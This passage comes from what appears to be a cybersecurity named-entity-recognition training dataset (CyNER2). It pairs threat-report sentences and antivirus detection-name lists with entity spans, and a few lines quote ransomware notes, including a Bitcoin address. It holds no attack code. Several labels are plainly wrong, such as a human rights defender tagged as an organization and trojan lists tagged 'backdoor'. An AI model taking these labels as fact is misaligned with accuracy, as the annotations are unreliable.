Trojan:Win32/Tosct.A Trojan/Win32.Connapts.C256364 Trojan.Small.coy Trojan.Small Win32.Trojan.Small.Aiik Trojan.Small!nYMaRKVOefk W32/Dloader.FAV!tr", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004518", "source": "cyner2_train"}} {"text": "In these websites they hosted malware that was digitally signed with a valid, likely stolen code signing certificate", "spans": {"MALWARE: malware": [[30, 37]], "MALWARE: stolen code": [[85, 96]]}, "info": {"id": "cyner2_train_004519", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Hybris.B@mm Email-Worm.Win32.Hybris!O Worm.Hybris W32/Hybris.dll@MM W95.Hybris.PI.msOW W32/Hybris.dll@MM WORM_HYBRIS.F Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Hybris.worm.B W95.Hybris.worm WORM_HYBRIS.F Win.Trojan.Hybris-10 Win32.Hybris.B@mm Email-Worm.Win32.Hybris.plugin Win32.Hybris.B@mm Trojan.Win32.Hybris.upukw Win32.Hybris Win32.Hybris.B@mm EmailWorm.Win32.Hybris.lki Win98.Vecna.23040 Worm.Hybris.Win32.8 BehavesLike.Win32.Virut.pm W32/Hybris.worm.B Worm/Hybris.c Worm[Email]/Win32.Hybris Worm:Win32/Hybris.C@mm Email-Worm.Win32.Hybris.plugin I-Worm/Hybris.Variant Win32.Hybris.B@mm W32/Hybris.Wsock Win32.Hybris.E2C45E Win32/Hybris.dll Win32.Worm-email.Hybris.Wuqu I-Worm.Hybris Email-Worm.Win32.Hybris.Based W32/Hybris.dll@mm Win32/Worm.Email-Worm.47d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004520", "source": "cyner2_train"}} {"text": "Who is behind Judy ? 
The malicious apps are all developed by a Korean company named Kiniwini , registered on Google Play as ENISTUDIO corp .", "spans": {"MALWARE: Judy": [[14, 18]], "ORGANIZATION: Kiniwini": [[84, 92]], "SYSTEM: Google Play": [[109, 120]], "ORGANIZATION: ENISTUDIO corp": [[124, 138]]}, "info": {"id": "cyner2_train_004521", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.8BE3 Win32.Neveg.C@mm Worm/W32.Neveg.52294.B W32/Neveg.c@MM W32/Neveg.c Win32.Neveg.C@mm Trojan.Win32.Neveg.iclu W32/Neveg.D@mm W32.Neveg.C@mm Win32/Neveg.C WORM_NEVEG.C Worm.Neveg.C.4 Email-Worm.Win32.Neveg.c I-Worm.Neveg!ysm95GgJE50 I-Worm.Win32.Neveg.52294.C[h] W32.W.Neveg.c!c Win32.Neveg.C@mm Worm.Win32.Neveg.C Win32.Neveg.C@mm Win32.HLLM.Peerage Worm.Neveg.Win32.1 WORM_NEVEG.C BehavesLike.Win32.Ramnit.qc W32/Neveg.URKR-8484 Worm[Email]/Win32.Neveg Win32.Neveg.EB4884 Worm/Win32.MyDoom Worm:Win32/Neveng.C@mm Win32.Neveg.C@mm Worm.Neveg W32/Neveg.D.worm Win32.Worm-email.Neveg.Lpbl Email-Worm.Win32.Neveg.C Win32.Neveg.C@mm I-Worm/Neveg.C Worm.Win32.Neveg.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004522", "source": "cyner2_train"}} {"text": "Ahmed Mansoor is an internationally recognized human rights defender, based in the United Arab Emirates UAE, and recipient of the Martin Ennals Award sometimes referred to as a Nobel Prize for human rights .", "spans": {"ORGANIZATION: Ahmed Mansoor": [[0, 13]], "ORGANIZATION: human rights defender,": [[47, 69]]}, "info": {"id": "cyner2_train_004524", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Trojan.MOBS-7437 Win.Trojan.B-474 Virus.Win32.Virut.CE Trojan.Heur.LP.EE1B95 Backdoor:Win32/Liudoor.B!dha Backdoor/Win32.Liudoor.R192527 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004527", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDropper.Dorkbot.II4 Backdoor.Bifrose.Win32.18816 Backdoor.Bifrose Trojan/Midgare.advf 
TROJ_DROPPER.SMS Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Dropper Win32/Bifrose.KJ TROJ_DROPPER.SMS Win.Trojan.Bifrose-9522 Trojan.Win32.Midgare.bqxuse BackDoor.Bifrost.26217 BehavesLike.Win32.Downloader.kc Backdoor/Bifrose.ovy TR/Midgare.adjf Trojan[Backdoor]/Win32.Bifrose Win32.Hack.MnlessT.lo.88519 TrojanDropper:Win32/Dooxud.A Trojan.Graftor.D46F7 Backdoor.Win32.Bifrose.77824.N Trojan/Win32.Bifrose.R3685 Backdoor.Bifrose VirTool.Injector!nUBzjCDRby4 Trojan.Win32.Midgare", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004528", "source": "cyner2_train"}} {"text": "Proofpoint researchers originally discovered the Panda Banker malware in February, 2016.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: the Panda Banker malware": [[45, 69]]}, "info": {"id": "cyner2_train_004529", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9961 Trojan.Win32.Bladabindi.esnxij Trojan.Win32.Z.Bladabindi.116224.CW Worm.MSIL.Autorun Trojan.MSIL.Bladabindi.1 TrojanDownloader:MSIL/Prardrukat.A Trj/GdSda.A Win32.Trojan.Atraps.Taew Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004530", "source": "cyner2_train"}} {"text": "Beginning on October 30, 2015, Palo Alto Networks began seeing instances of this new version of CryptoWall, which some researchers have begun calling version 4.", "spans": {"ORGANIZATION: Palo Alto Networks": [[31, 49]], "MALWARE: CryptoWall,": [[96, 107]], "ORGANIZATION: researchers": [[119, 130]], "MALWARE: version 4.": [[150, 160]]}, "info": {"id": "cyner2_train_004531", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeFolderDAS.Trojan Backdoor.Win32.BlackHole!O Worm.RussoTuristo Worm.RussoTuristo.Win32.83 Trojan.Heur.E54A1B Win32/Russo.A Worm.Win32.RussoTuristo.f Trojan.Win32.Amorale.crsxml Worm.Win32.RussoTuristo.53326 Trojan.Win32.FakeFolder.pb Win32.HLLW.Amorale BehavesLike.Win32.Adware.qh 
Backdoor/Blackhole.bmv Worm/Win32.RussoTuristo Worm.Win32.RussoTuristo.f Worm/Win32.RussoTuristo.R58000 Worm.TycKa.K Worm.Win32.RussoTuristo Worm.Win32.FakeFolder.CI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004533", "source": "cyner2_train"}} {"text": "In the past weeks on 6 August 2016, Cyberkov Security Incident Response Team CSIRT received a numerous Android malwares operating in different areas in Libya especially in Tripoli and Benghazi.", "spans": {"ORGANIZATION: Cyberkov Security Incident Response Team CSIRT": [[36, 82]], "MALWARE: Android malwares": [[103, 119]]}, "info": {"id": "cyner2_train_004534", "source": "cyner2_train"}} {"text": "Since January 2016, discreet campaigns involving malware called Trojan.Odinaff have targeted a number of financial organizations worldwide.", "spans": {"THREAT_ACTOR: campaigns": [[29, 38]], "MALWARE: malware called": [[49, 63]], "ORGANIZATION: financial organizations worldwide.": [[105, 139]]}, "info": {"id": "cyner2_train_004535", "source": "cyner2_train"}} {"text": "The campaign Talos analysed focused on Brazilian users and also attempted to remain stealthy by using multiple methods of re-direction in an attempt to infect the victim machine.", "spans": {"THREAT_ACTOR: The campaign": [[0, 12]], "ORGANIZATION: Talos": [[13, 18]], "ORGANIZATION: Brazilian users": [[39, 54]], "SYSTEM: the victim machine.": [[159, 178]]}, "info": {"id": "cyner2_train_004536", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Syamcrog Trojan.Ursu.D1107 Win.Trojan.Bifrose-10939 Trojan.Win32.Tiny.etjahi TR/Downloader.wgueo Trojan:Win32/Syamcrog.A Trojan.Refroso Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004537", "source": "cyner2_train"}} {"text": "Unfortunately, the ransomware developers were not apprehended and it now appears they have been biding their time before releasing a new ransomware.", "spans": {"THREAT_ACTOR: ransomware developers": [[19, 
40]], "MALWARE: ransomware.": [[137, 148]]}, "info": {"id": "cyner2_train_004538", "source": "cyner2_train"}} {"text": "Meanwhile, we have informed the Google Play security team about the RetroTetris app and are awaiting their response.", "spans": {"ORGANIZATION: Google Play security team": [[32, 57]], "MALWARE: RetroTetris app": [[68, 83]]}, "info": {"id": "cyner2_train_004540", "source": "cyner2_train"}} {"text": "Adobe released a patch for the vulnerability on July 8, 2015.", "spans": {"ORGANIZATION: Adobe": [[0, 5]], "VULNERABILITY: vulnerability": [[31, 44]]}, "info": {"id": "cyner2_train_004541", "source": "cyner2_train"}} {"text": "The malware payloads observed to be associated with the Uyghur themed C2 domains so far consist of PlugX, Gh0st RAT, and Saker/Xbox, although there may be others that are yet to be discovered.", "spans": {"MALWARE: The malware payloads": [[0, 20]], "ORGANIZATION: Uyghur": [[56, 62]], "MALWARE: PlugX, Gh0st RAT,": [[99, 116]], "MALWARE: Saker/Xbox,": [[121, 132]]}, "info": {"id": "cyner2_train_004543", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.cc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004546", "source": "cyner2_train"}} {"text": "Not only that, but the Windows version was additionally equipped with a valid code signing signature.", "spans": {"SYSTEM: Windows version": [[23, 38]]}, "info": {"id": "cyner2_train_004547", "source": "cyner2_train"}} {"text": "This was followed by another great blog by McAfee on the same subject but my focus will be on a specific aspect mentioned in the RSA blog which is the exploit used. 
FireEye discovered a malicious docx exploiting a zero day vulnerability in Microsoft's Encapsulated Postscript EPS filter, in the summer of 2015.", "spans": {"ORGANIZATION: McAfee": [[43, 49]], "ORGANIZATION: RSA": [[129, 132]], "MALWARE: exploit": [[151, 158]], "ORGANIZATION: FireEye": [[165, 172]], "VULNERABILITY: exploiting a zero day vulnerability": [[201, 236]]}, "info": {"id": "cyner2_train_004548", "source": "cyner2_train"}} {"text": "The first trace of this tool in our telemetry data dates back to late 2015.", "spans": {"MALWARE: tool": [[24, 28]], "SYSTEM: telemetry data": [[36, 50]]}, "info": {"id": "cyner2_train_004553", "source": "cyner2_train"}} {"text": "This report is a comprehensive description of the JSocket Remote Access Tool RAT, and its significant capability to control PCs, Linux machines, Macs and Android devices.", "spans": {"MALWARE: JSocket Remote Access Tool RAT,": [[50, 81]], "SYSTEM: Linux machines, Macs": [[129, 149]], "SYSTEM: Android devices.": [[154, 170]]}, "info": {"id": "cyner2_train_004554", "source": "cyner2_train"}} {"text": "Earlier this month, FortiGuard Labs researchers published findings about a malware campaign exploiting a PowerPoint vulnerability.", "spans": {"ORGANIZATION: FortiGuard Labs researchers": [[20, 47]], "THREAT_ACTOR: malware campaign": [[75, 91]], "VULNERABILITY: exploiting a PowerPoint vulnerability.": [[92, 130]]}, "info": {"id": "cyner2_train_004555", "source": "cyner2_train"}} {"text": "While the cyber-world was still shaking under the destructive ExPetr/Petya attack that hit on June 27, another ransomware attack targeting Ukraine at the same time went almost unnoticed.", "spans": {"THREAT_ACTOR: cyber-world": [[10, 21]], "MALWARE: ExPetr/Petya": [[62, 74]]}, "info": {"id": "cyner2_train_004556", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Johnnie.DB3AF Trojan.Win32.Clicker!BT W32/Trojan.IUSC-1586 TrojanClicker:MSIL/Youclick.A Trojan.Win32.Clicker!BT 
Trojan-Clicker.MSIL.Youclick", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004558", "source": "cyner2_train"}} {"text": "Recently, while researching attacks on targets in Thailand, Unit 42 discovered a tool that initially appeared to be a variant of the well-known PlugX RAT based on similar observed behavior such as the usage of DLL side-loading and a shellcode file.", "spans": {"ORGANIZATION: Unit 42": [[60, 67]], "MALWARE: tool": [[81, 85]], "MALWARE: variant": [[118, 125]], "MALWARE: PlugX RAT": [[144, 153]]}, "info": {"id": "cyner2_train_004560", "source": "cyner2_train"}} {"text": "YOUR PERSONAL ID: Personal ID of your computer, for example: 4df7065b1d049d098526344faaabf3f8", "spans": {}, "info": {"id": "cyner2_train_004562", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.lak4 Trojan.Heur.EFE584 Win32.Trojan.WisdomEyes.16070401.9500.9961 Backdoor.Trojan Trojan-PSW.Win32.LdPinch.zie Trojan.DownLoader.origin BehavesLike.Win32.Virut.nt Trojan-PSW.Win32.LdPinch.zie", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004564", "source": "cyner2_train"}} {"text": "The international investigation into the 2014 Iguala Mass Disappearance was targeted with infection attempts using spyware developed by the NSO group, an Israeli cyber warfare company", "spans": {"ORGANIZATION: Iguala Mass": [[46, 57]], "MALWARE: spyware": [[115, 122]], "ORGANIZATION: the NSO group,": [[136, 150]], "ORGANIZATION: Israeli cyber warfare": [[154, 175]]}, "info": {"id": "cyner2_train_004567", "source": "cyner2_train"}} {"text": "In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors, several financial institutes, and the Israeli Post Office.", "spans": {"ORGANIZATION: IT vendors,": [[87, 98]], "ORGANIZATION: financial institutes,": [[107, 128]], "ORGANIZATION: Israeli Post Office.": [[137, 157]]}, "info": {"id": "cyner2_train_004568", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: VB:Trojan.VBA.Downloader.BU X97M.Petya.A VB:Trojan.VBA.Downloader.BU X2KM_GOLDENEYE.B Xls.Dropper.Goldeneye-3 VB:Trojan.VBA.Downloader.BU Trojan.Script.DnlrObj.ejzqyq Troj.Downloader.Script!c VB:Trojan.VBA.Downloader.BU VB:Trojan.VBA.Downloader.BU X2KM_GOLDENEYE.B X97M/Downloader.au VB:Trojan.VBA.Downloader.BU Trojan:O97M/Goldeneye.A X97M/Downloader.au Trojan-Ransom.VBA.GoldenEye Macro.Trojan-Dropper.Petya.R O97M/Dropper.ALI virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004569", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Haed!O Trojan/Dropper.Haed.co TROJ_DROP.SMUS1 W32/Dropper.BJGT Backdoor.Trojan TROJ_DROP.SMUS1 Win.Trojan.Haed-1 Trojan-Dropper.Win32.Haed.eno Trojan.Win32.Drop.mqlso Troj.Dropper.W32.Haed.eno!c TrojWare.Win32.Kryptik.BAN Trojan.Click1.57099 Dropper.Haed.Win32.381 virus.win32.ramnit.j W32/Risk.OLFU-0240 TR/Drop.He4Hook.B W32/Haed.A!tr.dldr Trojan[Dropper]/Win32.Haed Trojan.Heur.JP.E9E07C Dropper/Win32.Haed.N349364692 AdWare.AdPlus Win32.Trojan-Dropper.Haed.cfsr Trojan-Downloader.Win32.Frethog", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004571", "source": "cyner2_train"}} {"text": "In recent months, the malware used in the EITest campaign has been ransomware such as Spora and Mole.", "spans": {"MALWARE: the malware": [[18, 29]], "THREAT_ACTOR: the EITest campaign": [[38, 57]], "MALWARE: ransomware": [[67, 77]], "MALWARE: Spora": [[86, 91]], "MALWARE: Mole.": [[96, 101]]}, "info": {"id": "cyner2_train_004576", "source": "cyner2_train"}} {"text": "Example note:Please follow the instructions Send $300 worth of Bitcoin to following address: 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX", "spans": {}, "info": {"id": "cyner2_train_004577", "source": "cyner2_train"}} {"text": "This specific APK was modified to include the malicious remote access tool RAT called DroidJack also known as SandroRAT, which would virtually 
give an attacker full control over a victim's phone.", "spans": {"SYSTEM: APK": [[14, 17]], "MALWARE: malicious remote access tool RAT called DroidJack": [[46, 95]], "MALWARE: SandroRAT,": [[110, 120]], "THREAT_ACTOR: attacker": [[151, 159]], "ORGANIZATION: victim's phone.": [[180, 195]]}, "info": {"id": "cyner2_train_004578", "source": "cyner2_train"}} {"text": "While performing some research online, Unit 42 was able to identify the following sample, which is being labeled as Trojan.Win32.Seadask' by a number of anti-virus companies.", "spans": {"ORGANIZATION: Unit 42": [[39, 46]], "ORGANIZATION: anti-virus companies.": [[153, 174]]}, "info": {"id": "cyner2_train_004579", "source": "cyner2_train"}} {"text": "Truth be told, these are all likely just improvements by the author to fix bugs or simply a shift in approach to make signature matching more difficult rather then a completely new variant.", "spans": {}, "info": {"id": "cyner2_train_004580", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_INJECT.YYTS Win32.Trojan.WisdomEyes.16070401.9500.9953 Infostealer.Limitail TROJ_INJECT.YYTS Trojan.Win32.Inject.dkhjux Trojan/Scarsi.uz W32.Tepfer.Uqxl TR/MailPassStlr.A.87 Trojan[Dropper]/Win32.FrauDrop Trojan:MSIL/Limitless.A Trojan/Win32.DarkKomet.C641651 TrojanDropper.Injector Trj/CI.A Trojan.Injector!yje4mrhO7hs", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004581", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.SWF.CVE-2012-0754.B Exploit/W32.CVE-2012-0754 Exp.SWF.CVE-2012-0754 Exploit.CVE-2012-0754 Exploit.SWF.CVE-2012-0754.a!c Trojan.Mdropper SWF/Exploit.CVE-2012-0754.A SWF_EXPLCVE.A Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.a Exploit.SWF.CVE-2012-0754.B Exploit.S.D-Encrypted.106604 Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.B Exploit.CVE-2012-0754.1 SWF_EXPLCVE.A Exploit-MSWord.o DOC/SWFDropper.A!Camelot TrojanDownloader.SWF.t Trojan[Exploit]/SWF.CVE-2012-0754.a 
Exploit:Win32/CVE-2012-0754.A Exploit.SWF.CVE-2012-0754.B Exploit.SWF.CVE-2012-0754.a Exploit-MSWord.o Exploit.SWF.CVE-2012-0754.a Win32.Exploit.Cve-2012-0754.Ajli Exploit.CVE-2012-0754.A Exploit.SWF.CVE-2012-0754 W32/SWFExp.AS!tr Win32/Trojan.Exploit.6a5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004582", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.BHO!O TrojanDownloader.Gamup Trojan/BHO.obt Trojan.Zusy.D42D95 TROJ_STARTP.SML2 Win32.Trojan.BHO.n TROJ_STARTP.SML2 Win.Trojan.OnlineGames-65 Trojan-Downloader.Win32.Gamup.qjl Trojan.Win32.Gamup.ciurh Trojan.Win32.A.Downloader.409816[UPX] Troj.Downloader.W32.Gamup!c Trojan.DownLoad2.34122 Downloader.Gamup.Win32.146 BehavesLike.Win32.Backdoor.cc Trojan.Win32.StartPage TR/BHO.efkmnb Trojan[Downloader]/Win32.Gamup Trojan-Downloader.Win32.Gamup.qjl TrojanDownloader.Gamup Win32.Trojan-downloader.Gamup.Ebhc Win32/Trojan.f4f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004583", "source": "cyner2_train"}} {"text": "During the past few weeks there has been an increase in malvertising attacks, for example via a series of compromises of open source Revive ad servers which is still continuing.", "spans": {"SYSTEM: open source Revive ad servers": [[121, 150]]}, "info": {"id": "cyner2_train_004584", "source": "cyner2_train"}} {"text": "Utilizing AutoIT within a payload is unique because it is a legitimate management tool.", "spans": {"MALWARE: AutoIT": [[10, 16]], "MALWARE: payload": [[26, 33]], "SYSTEM: legitimate management tool.": [[60, 87]]}, "info": {"id": "cyner2_train_004586", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Batman.B Trojan/W32.Batman.24576 Trojan.Batman.B Trojan/Batman.b Trojan.Batman.B W32.BatmanTroj Win32/Batman.B TROJ_BATMAN.B Dos.Trojan.an-1 Trojan.Win32.Batman.b Trojan.Win32.Batman.dcuw Trojan.Win32.S.Batman.24576[h] Win32.Trojan.Batman.Efkt Trojan.Batman.B TrojWare.Win32.Batman.B0 
Trojan.Batman.B Trojan.Batman.24576 Trojan.Batman.Win32.2 TROJ_BATMAN.B W32/Trojan.DVOK-6663 Trojan/Win32.Batman.b TR/Batman.B W32/Batman.B!tr Trojan/Win32.Batman Trojan.Batman.B Troj.W32.Batman.b!c Trojan:Win32/Batman.B Trojan/Win32.Batman.N15760 Trojan.Batman Trojan.Batman!bY5LWYbvsHM Trojan.Win32.Batman Trojan.Batman.B Trj/Batman.B Win32/Trojan.022", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004587", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TrojWare.MSIL.Injector.AOX BackDoor.Blackshades.2 Trojan/Foreign.axc Trojan[Ransom]/Win32.Foreign Trojan:MSIL/Parpwuts.C Win32/Trojan.74b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004588", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Daws!O TrojanDropper.Daws Win32.Worm.VB.sk W32.SillyFDC Trojan-Dropper.Win32.Daws.bkbb Trojan.Win32.Daws.dwunho Trojan.MulDrop4.55506 Dropper.Daws.Win32.11917 BehavesLike.Win32.VBObfus.vz Win32/Virut.bv Trojan[Dropper]/Win32.Daws TrojanDropper:Win32/Vimdop.A!bit Trojan.Razy.D1F32 Trojan-Dropper.Win32.Daws.bkbb Dropper/Win32.Daws.R88727 TScope.Trojan.VB Win32.Trojan-dropper.Daws.Wsug Trojan.DR.Daws!i7I48rjdKf8 Trojan.VB2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004589", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.WebGame.66136.T Trojan-GameThief.Win32.OnLineGames!O PWS.Zhengtu.BB3 Trojan/OnLineGames.ajcfn Trojan.Zusy.D2717 Win32.Trojan-PSW.OLGames.cm Infostealer.Onlinegame Win.Trojan.Onlinegames-14906 Trojan.Win32.OnLineGames.vtdwn Troj.GameThief.W32.OnLineGames.lulb TrojWare.Win32.GameThief.Magania.~NWABZ Trojan.PWS.Wsgame.34942 Trojan.OnLineGames.Win32.120767 BehavesLike.Win32.Vundo.kh Heur:Trojan/PSW.OnLineGames Trojan[GameThief]/Win32.OnLineGames PWS:Win32/Zhengtu.B!dll Trojan/Win32.OnlineGameHack.R23439 PWS-OnlineGames.ld TrojanPSW.OnLineGames.ai 
Trojan.Win32.OnlineGames.zt Trojan.PWS.OnLineGames!atUPCfHrrdw Trojan-Spy.OnLineGames W32/Onlinegames.WXA!tr Trojan.PSW.Win32.GameOnline.EN", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004590", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Crypt.Delf.E Trojan.Crypt.Delf.E Trojan/Downloader.Dadobra.as Trojan.Crypt.Delf.E Trojan.DL.Dadobra!9AHkQxAvV1E W32/Bancos.APF Downloader.Trojan TSPY_BANKER.UV Trojan-Downloader.Win32.Dadobra.af Trojan.Crypt.Delf.E Trojan.Win32.Dadobra.cmicp Trojan.Win32.Downloader.375808.K[h] Trojan.Crypt.Delf.E Trojan.Crypt.Delf.E Trojan.DownLoader.2321 Downloader.Dadobra.Win32.410 TSPY_BANKER.UV TrojanDownloader.Dadobra.as Trojan[Downloader]/Win32.Dadobra TrojanDownloader:Win32/Dadobra.BM Troj.Downloader.W32.Dadobra.as!c Trojan/Win32.Dadobra Trojan.Crypt.Delf.E Trojan.Win32.Dadobra.af Trojan-Dropper.Delf W32/Delf.DOA!tr.dldr PSW.Banker.33.BG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004592", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VariantNetvat.Trojan Trojan.Netvat Backdoor.Trojan Trojan.Win32.Netvat.45056 Worm.Win32.Tenavt.A Trojan.DownLoader11.42361 BehavesLike.Win32.Downloader.pt W32/Trojan.SSPB-9075 Trojan:Win32/Netvat.E!Dll Trojan.Graftor.D29A7D Trojan/Win32.Menti.R124411 Win32.Trojan.Dropper.Heur Worm.Tenavt!JDujK3yXihg W32/Kryptik.DTAI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004593", "source": "cyner2_train"}} {"text": "However it's important to say that these attackers, and the toolset used, share a number of similarities with the BlackEnergy group, which conducted attacks against the energy industry in Ukraine in December 2015 and January 2016.", "spans": {"THREAT_ACTOR: attackers,": [[41, 51]], "MALWARE: toolset": [[60, 67]], "THREAT_ACTOR: BlackEnergy group,": [[114, 132]]}, "info": {"id": "cyner2_train_004595", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9906 Trojan.Win32.PeaceDuke.gfb Trojan.Win32.Z.Peaceduke.3126830 Win32.Trojan.Peaceduke.Taow BehavesLike.Win32.Worm.vc TR/PeaceDuke.wuwtd Backdoor:Win32/Cozer.A!dha Trojan.Win32.PeaceDuke.gfb Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004596", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/RiskWare.PEMalform.E W32.W.Otwycal.l4av Tool.YahooCrack HackTool.YahoCrack.21 HackTool:Win32/Yacra.2_1 HackTool.Win32.Yacra", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004598", "source": "cyner2_train"}} {"text": "The Trojan encrypts files on the compromised computer and adds the following prefix before file names: ISHTAR-", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: compromised computer": [[33, 53]]}, "info": {"id": "cyner2_train_004600", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Nethief.XP Backdoor/W32.Nethief.78611 Backdoor.Win32.Nethief!O Backdoor/Nethief.XP.a Win32.Trojan.WisdomEyes.16070401.9500.9612 W32/Nethief.K@bd Backdoor.Trojan Win32/Nethief.XP.A.Server BKDR_NETHIEFXP.A Backdoor.Nethief.XP Backdoor.Win32.Nethief.ek Backdoor.Nethief.XP Trojan.Win32.Nethief.dknn Backdoor.Win32.A.Nethief.78611[UPX] Win32.Backdoor.Nethief.Aiim Backdoor.Nethief.XP Backdoor.Win32.Nethief.XP.Server Backdoor.Nethief.XP BackDoor.NethiefXP Backdoor.Nethief.Win32.139 BKDR_NETHIEFXP.A BehavesLike.Win32.Virut.lc W32/Nethief.HBZO-6955 Backdoor/Nethief.XP BDS/Nethief.XP.A Trojan[Backdoor]/Win32.Nethief Win32.Hack.Nethief.XP.kcloud Backdoor.Nethief.XP Backdoor.W32.Nethief!c Backdoor.Win32.Nethief.ek Backdoor:Win32/NetThief_XP.B Trojan/Win32.HDC.C762 Backdoor.Nethief.XP Backdoor.Nethief Backdoor.Nethief!0mFzAwzISB0 Backdoor.Win32.Ceckno W32/Nethief.EK!tr.bdr Win32/Backdoor.048", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004602", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL 
Dropper/Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004605", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9593 Trojan.Evrial!G1 Trojan.Win32.Stealer.exjasr Trojan.PWS.Stealer.21117 BehavesLike.Win32.Backdoor.ch TR/PSW.CoinStealer.nvgeg Trojan.Win32.Z.Razy.139264.GJ Trojan:MSIL/Evrial.B MSIL.Packed.Kryptik.JH Trj/GdSda.A Win32/Trojan.322", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004606", "source": "cyner2_train"}} {"text": "Using an FTP server has some advantages.", "spans": {}, "info": {"id": "cyner2_train_004607", "source": "cyner2_train"}} {"text": "The threat group continually updated the Nemesis malware during their ongoing access to the victim environment, deploying several different variants of the same tools and adding functionality between iterations.", "spans": {"THREAT_ACTOR: threat group": [[4, 16]], "MALWARE: Nemesis malware": [[41, 56]]}, "info": {"id": "cyner2_train_004609", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.RedZone.406528 Trojan/PSW.RedZone.41 Win32/PSW.RedZone.41 TSPY_REDZONE.E Win.Spyware.62275-2 Trojan-PSW.Win32.RedZone.41 Trojan.Win32.RedZone.fqhw Trojan.Win32.A.PSW-RedZone.406528[h] Troj.PSW32.W.RedZone.41!c Win32.Trojan-qqpass.Qqrob.Dyzy TrojWare.Win32.PSW.RedZone.41 Trojan.PWS.RedZone.41 Trojan.RedZone.Win32.21 W32/Risk.MXEM-1318 Trojan/PSW.RedZone.41 TR/PSW.RedZone.41 Malware_fam.gw Trojan[PSW]/Win32.RedZone PWS:Win32/Redzone.4_1 TrojanPSW.RedZone Trojan.PWS.RedZone!tcLid0irw8w Trojan.Win32.PSW Win32/Trojan.PSW.087", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004610", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.PE Trojan.Dropper.UYL Virus/W32.Sality.D W32.Sality.U Trojan.Dropper.UYL Virus.Sality.Win32.25 Trojan.Dropper.UYL W32.SillyFDC Win32/Sality.AA 